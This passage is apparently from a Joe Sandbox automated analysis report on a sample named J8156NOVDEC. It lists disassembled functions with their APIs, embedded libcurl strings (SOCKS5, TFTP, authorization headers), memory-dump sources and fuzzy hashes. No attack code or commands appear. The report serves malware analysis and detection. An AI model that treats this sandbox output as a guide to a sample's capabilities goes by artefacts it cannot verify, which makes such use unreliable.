    Function 0064B950 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 291COMMON
    Download Yara Rule
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0064BD1E
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: %s$*$*$Connection #%ld to host %s left intact
    • API String ID: 930174750-3007101698
    • Opcode ID: 909881839fad61cff67ad13bc6322d980a4e72400e6f2a6d76d348893996f2f7
    • Instruction ID: 4227bfc2e8e3722f828ed95024a2497e24e19ab61b54518a30a573d51436005f
    • Opcode Fuzzy Hash: 909881839fad61cff67ad13bc6322d980a4e72400e6f2a6d76d348893996f2f7
    • Instruction Fuzzy Hash: 1DC15CB4A00208AFDB18DF58C495BEEB7B2FF49304F1491A9E8495B351DB31EA81CF91
    Function 00692430 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 270COMMON
    Download Yara Rule
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 00692735
    Strings
    • Failed to parse FETCH response., xrefs: 006926FD
    • *, xrefs: 00692480
    • Found %I64d bytes to download, xrefs: 00692553
    • Written %zu bytes, %I64u bytes are left for transfer, xrefs: 00692615
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: *$Failed to parse FETCH response.$Found %I64d bytes to download$Written %zu bytes, %I64u bytes are left for transfer
    • API String ID: 930174750-1642442384
    • Opcode ID: 66646f84b6f6559112ff262f43e66eefa6ca5fce52621e8663f43bac831447b0
    • Instruction ID: e895575a90eb625c2716edc5fdd951288616a9dd0cc5302c79dbf3d2ba36e01d
    • Opcode Fuzzy Hash: 66646f84b6f6559112ff262f43e66eefa6ca5fce52621e8663f43bac831447b0
    • Instruction Fuzzy Hash: DCB181B5E00109AFDF04DF98D8A1FEEB7B6BF49304F248268E415AB785D631AD41CB60
    Function 006A49E0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 237COMMON
    Download Yara Rule
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006A4CBF
    Strings
    • %sAuthorization: Negotiate %s, xrefs: 006A4BBF
    • ^, xrefs: 006A4B50
    • Negotiate, xrefs: 006A4B37
    • Curl_output_negotiate, no persistent authentication: cleanup existing context, xrefs: 006A4B0F
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: %sAuthorization: Negotiate %s$Curl_output_negotiate, no persistent authentication: cleanup existing context$Negotiate$^
    • API String ID: 930174750-805764584
    • Opcode ID: 0486f01a92be7e7718a8de7404078bb5a799355799bdd7147d75b95f754af3e6
    • Instruction ID: 7c029297082641a96228fd3ee093df952c2cb691f327a992ca691260eb630b9d
    • Opcode Fuzzy Hash: 0486f01a92be7e7718a8de7404078bb5a799355799bdd7147d75b95f754af3e6
    • Instruction Fuzzy Hash: 30A16170A00208EFDB14DF99D880BEDBBB2AF86314F148169E9066B341DB75DE41DFA5
    Function 0068D930 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 237COMMON
    Download Yara Rule
    APIs
    • recvfrom.WS2_32(?,?,?,00000000,?,00000080), ref: 0068D9D0
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0068DCDA
    Strings
    • Internal error: Unexpected packet, xrefs: 0068DC89
    • Received too short packet, xrefs: 0068DA3C
    • TFTP error: %s, xrefs: 0068DC29
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8recvfrom
    • String ID: Internal error: Unexpected packet$Received too short packet$TFTP error: %s
    • API String ID: 1850307299-477593554
    • Opcode ID: c76d8d399d73613f55f02d5c81433090cce2f5daaf0b3aaac019bf6432fc04e1
    • Instruction ID: d97cb70a7629479852d6ef031546f5c47e37fa4546619f6c5fbee29c9c46ff6b
    • Opcode Fuzzy Hash: c76d8d399d73613f55f02d5c81433090cce2f5daaf0b3aaac019bf6432fc04e1
    • Instruction Fuzzy Hash: 22A15DB5A00214DFDB64EB18DC45F99B3B6AF85304F0481E8E54DAB342D771AE81CFA2
    Function 0069F1F5 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 221COMMON
    Download Yara Rule
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0069F99D
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: Entry path is '%s'$Entry path is '%s'$Failed to figure out path$SYST
    • API String ID: 930174750-3207682939
    • Opcode ID: e03d5ec6da0a243cd1b7c34ef0b25413fac9ba80ece9db8eec13f38aac63e79c
    • Instruction ID: 718f2328c7bed2cf27dc894110fbbbe3cc7f492c83f168fff61562aedbf6291b
    • Opcode Fuzzy Hash: e03d5ec6da0a243cd1b7c34ef0b25413fac9ba80ece9db8eec13f38aac63e79c
    • Instruction Fuzzy Hash: 2A917DB5E00214EFCF14DF98E891BAEBBB6BF85304F158169E801AB341D735A942CB81
    Function 006DF82A Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 206COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _free_strpbrk
    • String ID: *?
    • API String ID: 3300345361-2564092906
    • Opcode ID: cb65d34e611ef958ac0bd9c56af0c23edd4ea3ca42ce5662da5ee801020912e3
    • Instruction ID: 4dda8f643b699ecf80d77baf30cea591333188c5078243dbd8f34100356d907f
    • Opcode Fuzzy Hash: cb65d34e611ef958ac0bd9c56af0c23edd4ea3ca42ce5662da5ee801020912e3
    • Instruction Fuzzy Hash: 04614E75E00219AFDB14DFA9C8819EDFBF6EF48310B24816EE856F7344D671AE418B90
    Function 006660E0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 198COMMON
    Download Yara Rule
    APIs
    • ___from_strstr_to_strchr.LIBCMT ref: 00666227
      • Part of subcall function 00679A90: @_RTC_CheckStackVars@8.LIBCMT ref: 00679B5A
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0066633E
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8$___from_strstr_to_strchr
    • String ID: %.*s$%sAuthorization: Digest %s$0o
    • API String ID: 2360737596-1021650720
    • Opcode ID: dce9d4fe13f9cb035d8c5f3ff5c3fdb87250ad847518fe33eca6536c7a45d001
    • Instruction ID: 47b29dbdd65840847e7c243b62ba0fa51546b8b0ab30eac5a6b236c6f3ecb4a7
    • Opcode Fuzzy Hash: dce9d4fe13f9cb035d8c5f3ff5c3fdb87250ad847518fe33eca6536c7a45d001
    • Instruction Fuzzy Hash: 93815B70D00218EFDB14DF98E885BEDBBB6BF49304F148129F905AB341D735AA41CB91
    Function 0068C9F0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 198COMMON
    Download Yara Rule
    APIs
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0068CAB9
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0068CB57
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0068CBDE
    Strings
    • Connection time-out, xrefs: 0068CA75
    • set timeouts for state %d; Total %ld, retry %d maxtry %d, xrefs: 0068CC1D
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
    • String ID: Connection time-out$set timeouts for state %d; Total %ld, retry %d maxtry %d
    • API String ID: 885266447-3902073479
    • Opcode ID: 35d1a3fb6c42ec9fd94d09e06947c50fc45c66318a8dbeeb19f3719338a5b059
    • Instruction ID: 3ff20d07a1cacea71055cbf7a49b8600510b8828d4a6f8f68f4ae2d411bd3cd6
    • Opcode Fuzzy Hash: 35d1a3fb6c42ec9fd94d09e06947c50fc45c66318a8dbeeb19f3719338a5b059
    • Instruction Fuzzy Hash: 3F81EEB4A00209EFDB44DF58C891BAD7BB6FF48354F108259E849AB341D775EA82CF94
    Function 006BA740 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 170COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _strlen$CheckStackVars@8
    • String ID: %s %02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x$Tk
    • API String ID: 3286693010-2113013566
    • Opcode ID: 588792746ffb89363750fd90cc47b59cc31ee4eb6e50657c8a53421ea9516f3c
    • Instruction ID: 4e337a939ed321ed5524cc12966d0c30cd505ca6db4e82dc58a5a5f271aebd63
    • Opcode Fuzzy Hash: 588792746ffb89363750fd90cc47b59cc31ee4eb6e50657c8a53421ea9516f3c
    • Instruction Fuzzy Hash: 9751C3F2A041696BDB089FE8E911BEE7AEA9B8C300F108039F555D62C1D57ADB408B71
    Function 0063C640 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 155COMMON
    Download Yara Rule
    APIs
    • __CxxThrowException@8.LIBVCRUNTIME ref: 0063C74D
      • Part of subcall function 006C3ACD: RaiseException.KERNEL32(?,?,006BD8D2,?,?,?,?,?,?,?,?,006BD8D2,?,006FA3D8,00000000,?), ref: 006C3B2D
    • __CxxThrowException@8.LIBVCRUNTIME ref: 0063C78C
    • ___std_exception_copy.LIBVCRUNTIME ref: 0063C7BF
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: Exception@8Throw$ExceptionRaise___std_exception_copy
    • String ID: ios_base::badbit set$ios_base::failbit set
    • API String ID: 3941765731-1240500531
    • Opcode ID: 326398af31474044a0479cdb8908a6683d4535060a2e74c9ddf11f3bef31dfc2
    • Instruction ID: 932f98bb765575de78a0994c2c998719deea5b57c8459a8f0ee7f80ab50a0668
    • Opcode Fuzzy Hash: 326398af31474044a0479cdb8908a6683d4535060a2e74c9ddf11f3bef31dfc2
    • Instruction Fuzzy Hash: 5A41B4B1900608AFC704DF68C841BEEBBFAEF49320F14811EF915A7781D731A944CBA4
    Function 0069AF70 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 137networkCOMMON
    Download Yara Rule
    APIs
    • getsockname.WS2_32(?,?,00000080), ref: 0069AFD9
    • accept.WS2_32(?,?,00000080), ref: 0069B008
      • Part of subcall function 006BFA14: _RTC_Failure.LIBCMT ref: 006BFA2D
      • Part of subcall function 00661F00: _strlen.LIBCMT ref: 00661F74
      • Part of subcall function 00661F00: _strlen.LIBCMT ref: 00661FCC
      • Part of subcall function 00661F00: @_RTC_CheckStackVars@8.LIBCMT ref: 00661FFA
      • Part of subcall function 006A6A30: ioctlsocket.WS2_32(?,8004667E,?), ref: 006A6A73
      • Part of subcall function 006A6A30: @_RTC_CheckStackVars@8.LIBCMT ref: 006A6A8A
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0069B121
    Strings
    • Connection accepted from server, xrefs: 0069B049
    • Error accept()ing server connect, xrefs: 0069B02E
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8$_strlen$Failureacceptgetsocknameioctlsocket
    • String ID: Connection accepted from server$Error accept()ing server connect
    • API String ID: 3884559954-2331703088
    • Opcode ID: a17e7c81eda5436a13759667292c6d9f51e75a20b472dceb49bea3ff7e378283
    • Instruction ID: ed57d51db8b3fe87c3d4c506235261358db551d56318b5b4a200f9367da4137e
    • Opcode Fuzzy Hash: a17e7c81eda5436a13759667292c6d9f51e75a20b472dceb49bea3ff7e378283
    • Instruction Fuzzy Hash: 3351D5B5E00208AFDB54DF58DC51BEE77BAEF45300F0442ACE949AB381DB759A84CB91
    Function 00676780 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 128COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8_strlen
    • String ID: %s:%s$%sAuthorization: Basic %s$1og
    • API String ID: 1951014933-3814163928
    • Opcode ID: 69e2ac486dc1399ba56df31c43a15340ffe8c7b5d19c1d5a8b0bc9c729ef6d67
    • Instruction ID: f62559f9ceb6bf2fd1feaefb1c2b896363d753eaf1aa422c6f12c63bc61df7e2
    • Opcode Fuzzy Hash: 69e2ac486dc1399ba56df31c43a15340ffe8c7b5d19c1d5a8b0bc9c729ef6d67
    • Instruction Fuzzy Hash: C7416FB5D00218AFCB14DF98D885BEEB7B6BF48304F148129F809BB351D7359A45CBA6
    Function 006A84CE Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 119COMMON
    Download Yara Rule
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006A8BE7
    Strings
    • SOCKS5 GSS-API protection not yet implemented., xrefs: 006A8955
    • Failed to send SOCKS5 connect request., xrefs: 006A89B0
    • SOCKS5 connect to %s (remotely resolved), xrefs: 006A8617
    • %s:%d, xrefs: 006A85F7
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: %s:%d$Failed to send SOCKS5 connect request.$SOCKS5 GSS-API protection not yet implemented.$SOCKS5 connect to %s (remotely resolved)
    • API String ID: 930174750-2335184823
    • Opcode ID: 1a4eabc1012e3717cd81c58558689436edf360050f9e46ca7458eb8b27b2a6d8
    • Instruction ID: fe424d08a422f7e348fb2610cd61352b3cb6b0c3af8af08268143d26b70f24ea
    • Opcode Fuzzy Hash: 1a4eabc1012e3717cd81c58558689436edf360050f9e46ca7458eb8b27b2a6d8
    • Instruction Fuzzy Hash: 44511BB09049598FCB24DF18DD94BAFB7B2BF85306F1441E8EA08A7381D6356E80CF55
    Function 00668250 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 115COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _strlen
    • String ID: identity$identity$identity
    • API String ID: 4218353326-4054963862
    • Opcode ID: 0bb8772956769706baed39fd8f0c708132625591e2d347a0ea29b5a9f538dad1
    • Instruction ID: aa79ec29bff5308220769bb7a7c2653ffa8690ce514e8a8094ec132265b1c565
    • Opcode Fuzzy Hash: 0bb8772956769706baed39fd8f0c708132625591e2d347a0ea29b5a9f538dad1
    • Instruction Fuzzy Hash: C4413DB4D00209EFDB04DFA8D941AAEBBB6BF44308F1441A9D805B7351E731AE41CBA6
    Function 00662380 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 98networkCOMMON
    Download Yara Rule
    APIs
    • recv.WS2_32(?,?,?,00000000), ref: 006623F9
    • WSAGetLastError.WS2_32 ref: 0066241A
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0066248E
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckErrorLastStackVars@8recv
    • String ID: 3'$Recv failure: %s
    • API String ID: 3739410375-3205223812
    • Opcode ID: f19acfd4baaeb369bc709428cd55f3e7749655fe58f027fc81125a26cb1afa87
    • Instruction ID: e7e5b4ff35e850facc9fd6998c3b13ea8c09d04a11a107d5cb89de6690bb39dc
    • Opcode Fuzzy Hash: f19acfd4baaeb369bc709428cd55f3e7749655fe58f027fc81125a26cb1afa87
    • Instruction Fuzzy Hash: B6319CB5A00609EFCB00DF98D891AAE77BAEF49310F008159F919AB341DB359A44CBD0
    Function 006624D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 88networkCOMMON
    Download Yara Rule
    APIs
      • Part of subcall function 006629D0: recv.WS2_32(?,?,?,00000000), ref: 00662B02
    • send.WS2_32(?,?,?,00000000), ref: 00662527
    • WSAGetLastError.WS2_32 ref: 00662548
      • Part of subcall function 006BFA14: _RTC_Failure.LIBCMT ref: 006BFA2D
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006625C3
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckErrorFailureLastStackVars@8recvsend
    • String ID: 3'$Send failure: %s
    • API String ID: 2342134196-1925326815
    • Opcode ID: 8f6a29f752ce45c69e7f4431d5680f2618d5a28117178f2d21820a8741edbfd4
    • Instruction ID: 10db9f25af024f469118cca5fa25e83824f487cf2adbfd3bd63f39788963a8e2
    • Opcode Fuzzy Hash: 8f6a29f752ce45c69e7f4431d5680f2618d5a28117178f2d21820a8741edbfd4
    • Instruction Fuzzy Hash: B5318DB5E00609AFCB50EF58D851BEE77B6BF49310F008268F9199B391DA359A44CB90
    Function 00688110 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84networkCOMMON
    Download Yara Rule
    APIs
    Strings
    • WSAStartup failed (%d), xrefs: 0068816C
    • insufficient winsock version to support telnet, xrefs: 006881D9
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckCleanupStackStartupVars@8
    • String ID: WSAStartup failed (%d)$insufficient winsock version to support telnet
    • API String ID: 1294282189-1763879679
    • Opcode ID: d95052d08931a31e7b03626d501ec0d6971f77f86e009ec4c1341ead1c9394db
    • Instruction ID: 90f578d9405439be2aecdb905e840ed086b4e75e4a1a954daeac6762350fda6f
    • Opcode Fuzzy Hash: d95052d08931a31e7b03626d501ec0d6971f77f86e009ec4c1341ead1c9394db
    • Instruction Fuzzy Hash: B02135B2E00125AFDB14AB59DC467FDB3B7EF85300F408179F485AB281E97C4A80D3A1
    Function 00688AF0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77networkCOMMON
    Download Yara Rule
    APIs
    • send.WS2_32(?,000000FF,00000003,00000000), ref: 00688B5D
